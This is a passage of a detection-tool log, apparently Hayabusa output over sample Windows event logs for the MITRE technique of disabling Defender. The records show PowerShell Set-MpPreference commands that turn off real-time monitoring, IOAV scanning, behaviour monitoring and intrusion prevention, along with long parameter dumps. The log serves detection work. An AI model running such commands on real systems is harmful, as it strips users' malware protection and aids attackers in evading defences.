Task/ID4688-Interactive shell using AT schedule task.evtx +2021-10-06 09:34:50.487 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or 
Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.513 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableRealtimeMonitoring $true,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.787 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" 
ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.788 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.794 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.797 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.805 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): 
""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.881 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableIOAVProtection $true,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.962 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; 
value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.962 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.986 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.989 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify 
tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:50.999 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.010 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableBehaviorMonitoring $true,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.070 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.071 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.088 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.091 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.106 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.118 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableIntrusionPreventionSystem $true,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 09:34:51.134 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; 
value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): 
